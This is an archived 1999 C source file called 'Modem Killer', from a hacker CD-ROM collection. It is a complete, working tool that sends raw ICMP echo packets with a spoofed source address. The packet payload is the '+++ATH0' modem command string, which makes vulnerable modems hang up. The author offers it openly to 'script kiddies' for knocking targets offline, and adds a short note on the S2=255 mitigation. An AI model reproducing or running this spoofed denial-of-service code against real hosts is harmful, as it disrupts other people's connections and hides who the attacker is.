home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / files / c_scripts / mdmrst.c < prev    next >
Encoding:
C/C++ Source or Header  |  1999-04-11  |  6.9 KB  |  247 lines
  1. /* Hi, this is basically a small C program to quickly use the +++AZH0 modem
  2.    bug on a given target. This thing is handy because you do not have to go
  3.    through the trouble of typing the ping string, and it spoofs, which is also
  4.    quite handy :)
  5.  
  6.    Anyway, use this to disconnect most modems on ANY OS on the internet by
  7.    sending an ICMP_ECHO_REQUEST with the contents of +++AZH0. The modem gets
  8.    it and (since it's an ICMP ECHO) sends the same packet back and resets. It
  9.    can be patched by setting the modem register S2 to such a value that turns
  10.    the command mode of the modem off (255 will do). The modem
  11.    will NOT execute the commands in the packets anymore and function stable.
  12.    NOTE: Before you actually USE this program, turn your OWN command mode of
  13.          Else, your modem will RESET upon trying to send the packets away.
  14.    Put the statement S2=255 somewhere in your modem CALL STRING.
  15.    It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
  16.    At least, it does so on my modem. Note that some modems will get into trouble
  17.    with the command mode turned off. If this is the case, tough, you CANNOT use
  18.    this program AND you ARE VULNERABLE to this attack.
  19.  
  20.    This should be it, all you script kiddies, have fun.
  21.    Do with this code wathever you want, it's way too simple and lame.
  22.  
  23.    I greet Hester Schadee, Robert Schols, Ed van Dijke for being people I like.
  24.    I thank Wietse Venema for writing postFix and for giving a nice lecture at
  25.    the SANE 98 Convention.
  26.  
  27.    Have fun,
  28.         Scrippie
  29.  
  30.   If you think this program is truly cool (which is not true) mail me at:
  31.  
  32.   ronald.huizer@wxs.nl
  33.  
  34.   If you sincerely wish to flame me, mail me at:
  35.   tw374044@student.twi.tudelft.nl
  36.   This mailaddress is forwarded to someone I really dislike.
  37.  
  38.   The way to patch a modem has been added thanks to Ardrian Gonzales...
  39.   Some modems may disconnect when trying to use the patch.
  40.  
  41. */
  42. #include <stdio.h>
  43. #include <unistd.h>
  44. #include <stdlib.h>
  45. #include <string.h>
  46. #include <sys/types.h>
  47. #include <sys/time.h>
  48. #include <sys/socket.h>
  49. #include <netdb.h>
  50. #include <netinet/in.h>
  51. #include <netinet/ip.h>
  52. #include <netinet/ip_icmp.h>
  53.  
  54. #define BUFFER 80
  55. #define RESET "+++ATH0\x0d"
  56. #define PATCH "+++ATH0H1TD112\x0d"
  57.  
  58. int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
  59. unsigned short in_cksum(u_short *addr, int len);
  60.  
  61.  
  62. int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
  63. {
  64.  
  65.    unsigned char  *packet;
  66.    struct iphdr   *ip;
  67.    struct icmphdr *icmp;
  68.    char *blah;
  69.    int rc;
  70.    int c;
  71.    int b=0;
  72.  
  73.    switch(type)
  74.    {    case (0): { blah = RESET; break; }
  75.     case (1): { blah = PATCH; break; }
  76.     default: blah = RESET;
  77.    }
  78.  
  79.         
  80.    packet = (unsigned char *)malloc(sizeof(struct iphdr) +
  81.                                 sizeof(struct icmphdr) + BUFFER);
  82.  
  83.    ip = (struct iphdr *)packet;
  84.    icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
  85.  
  86.    for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
  87.    {
  88.     if(b==strlen(blah)) b=0;
  89.     packet[c]=blah[b];
  90.     b++;
  91.    }
  92.  
  93.  
  94.    /* This is the IP header of our packet. */
  95.  
  96.    ip->ihl      = 5;
  97.    ip->version  = 4;
  98.    ip->tos      = 0;
  99.    ip->id       = htons(43210);
  100.    ip->frag_off = htons(0);
  101.    ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
  102.    ip->ttl      = 25;
  103.    ip->protocol = IPPROTO_ICMP;
  104.    ip->saddr    = spoof_addr;
  105.    ip->daddr    = dest_addr->sin_addr.s_addr;
  106.    ip->check    = in_cksum((u_short *)ip, sizeof(struct iphdr));
  107.  
  108.  
  109.    icmp->type = ICMP_ECHO;
  110.    icmp->code = 0;
  111.    icmp->checksum = 0;
  112.    icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
  113.  
  114.    if (sendto(socket,
  115.               packet,
  116.               sizeof(struct iphdr) +
  117.               sizeof(struct icmphdr) + BUFFER,0,
  118.               (struct sockaddr *)dest_addr,
  119.               sizeof(struct sockaddr)) == -1) { return(-1); }
  120.  
  121.    free(packet);
  122.    return(0);
  123.  
  124. }
  125.  
  126. int main(int argc, char **argv)
  127. {
  128.  
  129.    struct sockaddr_in dest_addr;
  130.    unsigned int i,sock,type;
  131.    unsigned long src_addr;
  132.  
  133.    if(geteuid()!=0)
  134.    {
  135.     fprintf(stderr, "You must be ROOT in order to run this!\n");
  136.         return(-1);
  137.    }
  138.  
  139.  
  140.  
  141.    printf("Modem Killer - Version 1.0b - Spoofable\n");
  142.    printf("By Scrippie\n");
  143.  
  144.    if ((argc != 5)) {
  145.  
  146.     printf("Use the following format:\n");
  147.     printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
  148.     printf("Where type means the type of the modem crash.\n");
  149.     printf("---------------------------------------------\n");
  150.     printf("Type 0: Makes the modem hangup\n");
  151.     printf("Type 1: Patches a modem against attacks\n");
  152.     printf("---------------------------------------------\n");
  153.     printf("Greetz, Scrippie\n");
  154.  
  155.       return(-1);
  156.    }
  157.  
  158.    switch(atoi(argv[4]))
  159.    {
  160.     case (0): { type = 0; break; }
  161.     case (1): { type = 1; break; }
  162.     default:{ printf("WRONG type you idiot!\n"); return(-1); }
  163.    }
  164.  
  165.    
  166.    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  167.    { 
  168.       fprintf(stderr,"No RAW sockets available...\n");
  169.       return(-1);
  170.    }
  171.    
  172.    if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
  173.    src_addr = dest_addr.sin_addr.s_addr;
  174.  
  175.    if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
  176.  
  177.    printf("Now sending the modem kill...\n");
  178.    for (i = 0;i < atoi(argv[3]);i++)
  179.    {
  180.     if (killmodem(sock, src_addr, &dest_addr, type) == -1)
  181.     {
  182.         fprintf(stderr,"Cannot send packet...\n");
  183.         return(-1);
  184.     }
  185.       usleep(10000);
  186.    }
  187. }
  188.  
  189. /*****************************************************************************\
  190. *** Of course, no one has EVER seen this piece of networking code before... ***
  191. \*****************************************************************************/
  192.  
  193. int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
  194. {
  195.  
  196.    struct hostent *host;
  197.  
  198.    memset(addr,0,sizeof(struct sockaddr_in));
  199.  
  200.    addr->sin_family = AF_INET;
  201.    addr->sin_addr.s_addr = inet_addr(name);
  202.  
  203.    if (addr->sin_addr.s_addr == -1) {
  204.       if (( host = gethostbyname(name) ) == NULL )  {
  205.          fprintf(stderr,"Unable to resolve host %s\n",name);
  206.          return(-1);
  207.       }
  208.       addr->sin_family = host->h_addrtype;
  209.       memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
  210.    }
  211.  
  212.    addr->sin_port = htons(port);
  213.    return(0);
  214.  
  215. }
  216.  
  217.  
  218. unsigned short in_cksum(u_short *addr, int len)
  219. {
  220.     register int nleft = len;
  221.     register u_short *w = addr;
  222.     register int sum = 0;
  223.     u_short answer = 0;
  224.  
  225.     /*
  226.      * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  227.      * sequential 16 bit words to it, and at the end, fold back all the
  228.      * carry bits from the top 16 bits into the lower 16 bits.
  229.      */
  230.     while (nleft > 1)  {
  231.         sum += *w++;
  232.         nleft -= 2;
  233.     }
  234.  
  235.     /* mop up an odd byte, if necessary */
  236.     if (nleft == 1) {
  237.         *(u_char *)(&answer) = *(u_char *)w ;
  238.         sum += answer;
  239.     }
  240.  
  241.     /* add back carry outs from top 16 bits to low 16 bits */
  242.     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  243.     sum += (sum >> 16);            /* add carry */
  244.     answer = ~sum;            /* truncate to 16 bits */
  245.     return(answer);
  246. }
  247.